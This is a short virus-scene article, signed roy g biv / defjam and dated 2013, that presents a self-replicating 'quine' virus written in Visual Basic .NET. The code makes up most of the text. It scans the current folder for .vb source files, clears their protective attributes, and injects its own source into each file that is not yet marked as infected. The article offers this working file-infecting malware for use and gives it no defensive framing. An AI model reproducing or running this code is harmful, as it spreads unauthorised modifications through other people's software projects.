﻿                      Quine Viruses in Visual Basic .NET
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

class quine
    shared sub Main()

        dim a="",                                       'place atoi(code,16) here first, begin with second '"'
            b=":dim a="+chr(34)+a,c,e,f,g,h             'create string declaration and append atoi entire code
        for c=1 to len(a)step 2
            b=b+chr(cint("&h"&mid(a,c,2)))              'append plaintext code
        next
        on error resume next
        c=createobject("scripting.filesystemobject")
        for each d in c.getfolder(".").files
            if lcase(c.getextensionname(d))="vb"then    'find all .vb files
                e=c.opentextfile(d).readall             'read entire file
                f=instr(lcase(e),"end sub")             'search for insertion point
                if instr(e,"Quine")=0and f>0then        'check for infection marker
                    g=d.attributes
                    d.attributes=0                      'make file writable
                    err.clear
                    h=c.createtextfile(d)
                    if err.number=0then
                        h.write(left(e,f-1)+b+mid(e,f)) 'write everything
                    end if
                    d.attributes=g                      'restore attributes
                end if
            end if
        next
        'Quine - roy g biv 05/09/13

    end sub
end class


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
